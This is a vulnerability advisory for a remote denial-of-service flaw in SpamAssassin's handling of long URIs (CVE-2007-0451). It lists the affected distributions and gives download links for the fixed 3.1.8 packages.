SpamAssassin Long URI Handling Remote Denial of Service Vulnerability
BID:22584
Info
SpamAssassin Long URI Handling Remote Denial of Service Vulnerability
| Bugtraq ID: | 22584 |
| Class: | Unknown |
| CVE: |
CVE-2007-0451 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 13 2007 12:00AM |
| Updated: | Mar 19 2015 08:26AM |
| Credit: | The vendor reported this vulnerability. |
| Vulnerable: |
SuSE SUSE Linux Enterprise Server SDK 9 SuSE SUSE Linux Enterprise Server 9 SP3 SuSE SUSE Linux Enterprise Server 9 SuSE SUSE Linux Enterprise Server 10 SuSE SUSE Linux Enterprise SDK 9 SuSE SUSE Linux Enterprise SDK 10 SuSE SUSE Linux Enterprise Desktop 10 SuSE Linux Professional 10.2 x86_64 SuSE Linux Personal 10.2 x86_64 SpamAssassin SpamAssassin 3.1.7 SpamAssassin SpamAssassin 3.1.6 SpamAssassin SpamAssassin 3.1.5 SpamAssassin SpamAssassin 3.1.4 SpamAssassin SpamAssassin 3.1.3 SpamAssassin SpamAssassin 3.1.2 SpamAssassin SpamAssassin 3.1.1 SpamAssassin SpamAssassin 3.1 S.u.S.E. UnitedLinux 1.0 S.u.S.E. SuSE Linux Standard Server 8.0 S.u.S.E. SuSE Linux School Server for i386 S.u.S.E. SUSE LINUX Retail Solution 8.0 S.u.S.E. SuSE Linux Openexchange Server 4.0 S.u.S.E. SuSE Linux Open-Xchange 4.1 S.u.S.E. SUSE CORE 9 for x86 S.u.S.E. openSUSE 10.2 S.u.S.E. Open-Enterprise-Server 9.0 S.u.S.E. Open-Enterprise-Server 1 S.u.S.E. Open-Enterprise-Server 0 S.u.S.E. Office Server S.u.S.E. Novell Linux POS 9 S.u.S.E. Novell Linux Desktop 9.0 S.u.S.E. Novell Linux Desktop 1.0 S.u.S.E. Linux Professional 10.0 OSS S.u.S.E. Linux Professional 10.0 S.u.S.E. Linux Professional 10.2 S.u.S.E. Linux Professional 10.1 S.u.S.E. Linux Personal 10.0 OSS S.u.S.E. Linux Personal 10.2 S.u.S.E. Linux Personal 10.1 S.u.S.E. Linux Openexchange Server S.u.S.E. Linux Office Server S.u.S.E. Linux Enterprise Server for S/390 9.0 S.u.S.E. Linux Enterprise Server for S/390 S.u.S.E. Linux Desktop 1.0 S.u.S.E. Linux Desktop 10 S.u.S.E. Linux Database Server 0 S.u.S.E. Linux Connectivity Server S.u.S.E. Linux 10.1 x86-64 S.u.S.E. Linux 10.1 x86 S.u.S.E. Linux 10.1 ppc S.u.S.E. Linux 10.0 x86-64 S.u.S.E. Linux 10.0 x86 S.u.S.E. Linux 10.0 ppc rPath rPath Linux 1 RedHat Enterprise Linux WS 4 RedHat Enterprise Linux ES 4 Red Hat Enterprise Linux Desktop 5 client Red Hat Enterprise Linux AS 4 Red Hat Enterprise Linux 5 Server Pardus Linux 2007.1 Mandriva Linux Mandrake 2007.0 x86_64 Mandriva Linux Mandrake 2007.0 MandrakeSoft Corporate Server 4.0 x86_64 MandrakeSoft Corporate Server 4.0 Gentoo mail-filter/spamassassin 3.1.7 |
| Not Vulnerable: |
SpamAssassin SpamAssassin 3.1.8 Gentoo mail-filter/spamassassin 3.1.8 |
Discussion
SpamAssassin Long URI Handling Remote Denial of Service Vulnerability
SpamAssassin is prone to a remote denial-of-service vulnerability.
This issue arises when the application handles excessively long URIs.
SpamAssassin versions prior to 3.1.8 are vulnerable to this issue.
SpamAssassin is prone to a remote denial-of-service vulnerability.
This issue arises when the application handles excessively long URIs.
SpamAssassin versions prior to 3.1.8 are vulnerable to this issue.
Exploit / POC
SpamAssassin Long URI Handling Remote Denial of Service Vulnerability
An attacker can use an email client to craft a message this is sufficient to trigger this vulnerability.
An attacker can use an email client to craft a message this is sufficient to trigger this vulnerability.
Solution / Fix
SpamAssassin Long URI Handling Remote Denial of Service Vulnerability
Solution:
The vendor has released version 3.1.8 to address this issue.
SpamAssassin SpamAssassin 3.1
SpamAssassin SpamAssassin 3.1.1
SpamAssassin SpamAssassin 3.1.2
SpamAssassin SpamAssassin 3.1.3
SpamAssassin SpamAssassin 3.1.4
SpamAssassin SpamAssassin 3.1.5
SpamAssassin SpamAssassin 3.1.6
SpamAssassin SpamAssassin 3.1.7
Solution:
The vendor has released version 3.1.8 to address this issue.
SpamAssassin SpamAssassin 3.1
-
RedHat Fedora spamassassin-3.1.8-1.fc5.i386.rpm
Fedora Core 5
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/5/ -
RedHat Fedora spamassassin-3.1.8-1.fc5.ppc.rpm
Fedora Core 5
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/5/ -
RedHat Fedora spamassassin-3.1.8-1.fc5.x86_64.rpm
Fedora Core 5
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/5/ -
RedHat Fedora spamassassin-debuginfo-3.1.8-1.fc5.i386.rpm
Fedora Core 5
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/5/ -
RedHat Fedora spamassassin-debuginfo-3.1.8-1.fc5.ppc.rpm
Fedora Core 5
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/5/ -
SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAs sassin-3.1.8.tar.gz
SpamAssassin SpamAssassin 3.1.1
-
SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAs sassin-3.1.8.tar.gz
SpamAssassin SpamAssassin 3.1.2
-
SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAs sassin-3.1.8.tar.gz
SpamAssassin SpamAssassin 3.1.3
-
SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAs sassin-3.1.8.tar.gz
SpamAssassin SpamAssassin 3.1.4
-
RedHat Fedora spamassassin-3.1.8-1.fc6.i386.rpm
Fedora Core 6
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/6/ -
RedHat Fedora spamassassin-3.1.8-1.fc6.ppc.rpm
Fedora Core 6
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/6/ -
RedHat Fedora spamassassin-3.1.8-1.fc6.x86_64.rpm
Fedora Core 6
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/6/ -
RedHat Fedora spamassassin-debuginfo-3.1.8-1.fc6.i386.rpm
Fedora Core 6
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/6/ -
RedHat Fedora spamassassin-debuginfo-3.1.8-1.fc6.ppc.rpm
Fedora Core 6
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/6/ -
RedHat Fedora spamassassin-debuginfo-3.1.8-1.fc6.x86_64.rpm
Fedora Core 6
http://download.fedora.redhat.com/pub/fedora/linux/core/updates/6/ -
SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAs sassin-3.1.8.tar.gz
SpamAssassin SpamAssassin 3.1.5
-
SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAs sassin-3.1.8.tar.gz
SpamAssassin SpamAssassin 3.1.6
-
SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAs sassin-3.1.8.tar.gz
SpamAssassin SpamAssassin 3.1.7
-
SpamAssassin Mail-SpamAssassin-3.1.8.tar.gz
http://www.signal42.com/mirrors/apache/spamassassin/source/Mail-SpamAs sassin-3.1.8.tar.gz
References
SpamAssassin Long URI Handling Remote Denial of Service Vulnerability
References:
References:
- Apache SpamAssassin 3.1.8 available! (SpamAssassin)
- SpamAssassin Home Page (SpamAssassin)
- RHSA-2007:0074-2 (Redhat)
- RHSA-2007:0075-2 spamassassin security update (Red Hat)
- RHSA-2007:0492-2 (Redhat)